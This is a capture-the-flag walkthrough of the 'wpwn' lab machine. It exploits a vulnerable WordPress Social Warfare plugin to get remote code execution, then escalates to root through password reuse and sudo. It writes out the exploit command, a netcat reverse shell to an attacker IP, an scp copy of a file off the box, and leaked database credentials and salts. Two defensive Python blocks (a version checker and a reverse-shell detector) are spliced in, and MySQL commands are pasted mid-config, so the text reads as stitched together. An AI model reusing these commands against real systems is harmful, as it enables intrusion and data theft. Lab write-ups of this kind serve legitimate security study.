wpwn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Upon running dirsearch, I found a WordPress login page.

wpscan --url http://192.168.140.123/wordpress/ --api-token 5Bv7irDgKEpTvFnZC1ZeuYbBzkTprSA0Wdwqz8TT0no

WordPress version 5.5

[+] social-warfare
 | Location: http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
 |      - https://www.webarxsecurity.com/social-warfare-vulnerability/
 |
 | Version: 3.5.2 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.140.123/wordpress/, Match: 'Social Warfare v3.5.2'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2
 |   - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.140.123/wordpress/wp-content/plugins/social-warfare/readme.txt
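The wpscan output above pins the plugin version from three places: a version comment on the homepage, the ?ver= query parameter on the plugin's own assets, and the Stable tag in readme.txt, then compares it with the advisory's "Fixed in" version. The following is an added example, not part of the original notes or of wpscan, that does the same comparison offline as a defender-side self-check. The HTML and readme.txt text it parses are constructed samples shaped like the artefacts wpscan reported; the plugin slug and the fixed-in version 3.5.3 come from the output above. It also goes one step beyond the text by reporting when the three sources disagree, and by comparing versions numerically so that 3.10.0 is not treated as older than 3.5.3.

```python
import re

# Constructed sample artefacts (not captured from the box above), in the shape
# wpscan's detections look at: a version comment plus asset URLs on the
# homepage, and the plugin's readme.txt.
SAMPLE_HOMEPAGE_HTML = """<!DOCTYPE html>
<html><head>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel="stylesheet" href="/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2">
<script src="/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2"></script>
</head><body></body></html>
"""

SAMPLE_README = """=== Social Warfare ===
Requires at least: 4.5
Stable tag: 3.5.2

== Changelog ==

= 3.5.2 =
* constructed changelog entry
"""

PLUGIN_SLUG = "social-warfare"
FIXED_IN = "3.5.3"  # "Fixed in" version from the wpscan advisory quoted above


def parse_version(text):
    """'3.5.2' -> (3, 5, 2). Integer tuples compare correctly, strings do not."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def version_from_comment(html):
    """Version advertised in the plugin's HTML comment on the homepage."""
    m = re.search(r"Social Warfare v(\d+(?:\.\d+)+)", html)
    return m.group(1) if m else None


def versions_from_asset_query(html, slug):
    """Every distinct ?ver= value attached to the plugin's own CSS/JS assets."""
    pattern = r"/plugins/" + re.escape(slug) + r"""/[^"'\s]*?\?ver=(\d+(?:\.\d+)+)"""
    return sorted(set(re.findall(pattern, html)))


def version_from_readme(readme):
    """'Stable tag:' line from readme.txt (the aggressive detection above)."""
    m = re.search(r"^Stable tag:\s*([\w.]+)", readme, re.MULTILINE)
    return m.group(1) if m else None


def is_vulnerable(version, fixed_in=FIXED_IN):
    """True when the installed version predates the first fixed release."""
    return parse_version(version) < parse_version(fixed_in)


def assess(html, readme, slug=PLUGIN_SLUG, fixed_in=FIXED_IN):
    sources = {
        "comment": version_from_comment(html),
        "asset_query": versions_from_asset_query(html, slug),
        "readme_stable_tag": version_from_readme(readme),
    }
    seen = set(sources["asset_query"])
    for key in ("comment", "readme_stable_tag"):
        if sources[key]:
            seen.add(sources[key])
    # Disagreement between sources is worth reporting on its own: a stale
    # readme or a cached asset URL can make a patched site look unpatched, or
    # the reverse. Until resolved, assume the oldest reported version.
    consistent = len(seen) == 1
    version = min(seen, key=parse_version) if seen else None
    return {
        "sources": sources,
        "version": version,
        "consistent": consistent,
        "vulnerable": bool(version) and is_vulnerable(version, fixed_in),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_HOMEPAGE_HTML, SAMPLE_README))
```

Run against a site you administer, the same functions take the fetched homepage and readme.txt; the fixed-in version is the input that changes per advisory, so keep it alongside the slug in whatever inventory you check plugins against.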

RCE looks interesting.

Found the exploit locally.

I read about the exploit here: https://wpscan.com/vulnerability/9259

Created a simple payload to read the /etc/passwd file and executed the following command:

python wprce.py -t http://192.168.140.123/wordpress/ --payload-uri http://192.168.49.140/payload.txt

It worked!

Now let's note the usernames:

www-data, takis, and root are the valid usernames; could brute-force SSH later.

Used the netcat reverse shell:

nc -e /bin/sh 192.168.49.140 4444

anddd we got a reverse shell as www-data!!!
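What the shell above looks like from the defender's side is a web server account (www-data) whose worker process suddenly spawns a shell, which in turn runs nc with -e. The following is an added example, not part of the original notes, of detection logic that flags exactly that chain in process-creation events. The event lines and their key=value format are constructed for the example (real EDR, auditd execve or Sysmon-for-Linux records would be normalised into this shape first); the account, parent and tool name lists are assumptions to tune per environment.

```python
import os
import re
import shlex

# Constructed process-creation events (not from the box above). The first two
# mirror the www-data -> sh -> nc chain from the writeup; the rest are benign.
SAMPLE_EVENTS = """\
2021-07-21T10:02:11Z user=www-data parent=apache2 comm=sh cmd="sh -c nc -e /bin/sh 192.168.49.140 4444"
2021-07-21T10:02:11Z user=www-data parent=sh comm=nc cmd="nc -e /bin/sh 192.168.49.140 4444"
2021-07-21T10:03:00Z user=www-data parent=apache2 comm=convert cmd="convert upload.png -resize 200x200 thumb.png"
2021-07-21T10:05:00Z user=root parent=cron comm=sh cmd="sh -c /usr/bin/apt-get update"
2021-07-21T10:06:00Z user=takis parent=sshd comm=bash cmd="-bash"
"""

# Assumed lists; extend for your own stack (e.g. php-fpm pool names).
WEB_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}
WEB_SERVER_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "php-fpm7.3"}
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
NET_TOOLS = {"nc", "ncat", "netcat", "socat", "telnet"}

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) '
    r'comm=(?P<comm>\S+) cmd="(?P<cmd>.*)"$'
)


def parse_event(line):
    """One constructed event line -> dict, or None for lines that do not match."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def flatten_tokens(cmd):
    """shlex-split a command line, descending into 'sh -c ...' style arguments."""
    try:
        parts = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in a hostile command line
        parts = cmd.split()
    out = []
    for tok in parts:
        out.extend(flatten_tokens(tok) if " " in tok else [tok])
    return out


def uses_reverse_shell_tool(cmd):
    """nc/ncat/netcat with -e or -c, socat exec:, or bash's /dev/tcp device."""
    lowered = cmd.lower()
    if "/dev/tcp/" in lowered or "exec:" in lowered:
        return True
    toks = flatten_tokens(cmd)
    names = [os.path.basename(t) for t in toks]
    for i, name in enumerate(names):
        if name in NET_TOOLS and any(t in ("-e", "-c") for t in toks[i + 1:]):
            return True
    return False


def analyse(event):
    """Return the list of rule names the event trips (empty when benign)."""
    reasons = []
    if (event["user"] in WEB_ACCOUNTS and event["parent"] in WEB_SERVER_PARENTS
            and event["comm"] in SHELLS):
        reasons.append("shell_spawned_by_web_server")
    if uses_reverse_shell_tool(event["cmd"]):
        reasons.append("reverse_shell_tool")
    return reasons


def detect(log_text):
    """Run both rules over every event line and collect alerts."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev:
            continue
        reasons = analyse(ev)
        if reasons:
            alerts.append({"ts": ev["ts"], "user": ev["user"],
                           "cmd": ev["cmd"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The first rule fires on the parent/child relationship alone, so it still catches a shell that calls back with a tool the second rule does not know about; the second rule catches the tool regardless of who started it. Image processing spawned by apache2 (the convert line) and cron's own sh are left alone.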

Priv esc:

WordPress config:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
mysql -u wp_user -p'R3&]vzhHmMn9,:-5' -e "SELECT VERSION();"
mysql -u root -e "SELECT VERSION();"

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '$bDhwe@ aW2=HmnqU6GU:#uE.Zfk-?;_:u.Q][{Xi0Z_k,+#nxnI[TNl2YB[<[cI' );
define( 'SECURE_AUTH_KEY',  '0D#hUv0AK{@zD -S[tO/@x2ZqEUb6H~7dU}|qon*o9To(!25rn25=^RnE83}czwx' );
define( 'LOGGED_IN_KEY',    '_.sLFXmT yAhC!QUo8.NXNm]l~}1m5{uWse59w)<PML i4PQX50f{wh%(Hr|qThu' );
define( 'NONCE_KEY',        '3TG=HS42u(X7s6.WUIeQ{@P$w(:]7.]Gmtk`ZlH5.`zAmU0K},(Z^srahRcNIUQY' );
define( 'AUTH_SALT',        '<i1,O4cg-nF0$uzV08?YgCVyx/Pe!bUZ!WZ$uLfQSHW8[0:%{GRP19D.%rvA!<}P' );
define( 'SECURE_AUTH_SALT', 'qNuof_(c=U36P(7jk4#l3bKoMJA9tHz(F!U-X;wQz8,In,:8*F^WNHB}^I`0Cs][' );
define( 'LOGGED_IN_SALT',   '}%].&sH`s8IBlb+iebj*Cp8:9#ctz{Py_d_O-OkAF|K;r(IH}6P7y;v{DXG*#N>W' );
define( 'NONCE_SALT',       ':<^2H)#:@7|lQP.M2FFL!+H1M&]nri4~)^6f/u&k|Bl$!xq2)@<jeZacZ8&mrpV}' );

password

Time to do enum!

scp apt.extended_states.1.gz kali@192.168.49.140:/tmp

/var/www/html/wordpress/wp-includes/class-snoopy.php:												// $cookies["username"]="joe";
/var/www/html/wordpress/wp-content/themes/twentytwenty/package-lock.json:				"parse-passwd": "^1.0.0"
/var/www/html/wordpress/wp-content/themes/twentytwenty/package-lock.json:			"integrity": "sha1-DTM+PwDqxQqhRUq9MO+MKl2ackI=",


/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword		= A challenge password
/etc/ssl/openssl.cnf:challengePassword_max		= 20
/etc/ssl/openssl.cnf:challengePassword_min		= 4
/etc/apache2/sites-available/default-ssl.conf:		#	 file needs this password: `xxj31ZMTZzkVA'.


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

Enumerating MySQL with creds:

mysql -u wp_user -p'R3&]vzhHmMn9,:-5' -e "SELECT VERSION();"
mysql -u root -p'R3&]vzhHmMn9,:-5' -e "SELECT VERSION();"

So.... just before I started enumerating the service, I realized that I had tried to ssh to the takis account with the password before the comma...

Now we are in as takis...!!!

And.. a simple sudo -l gave me a root shell!

This one was just like Alpha!
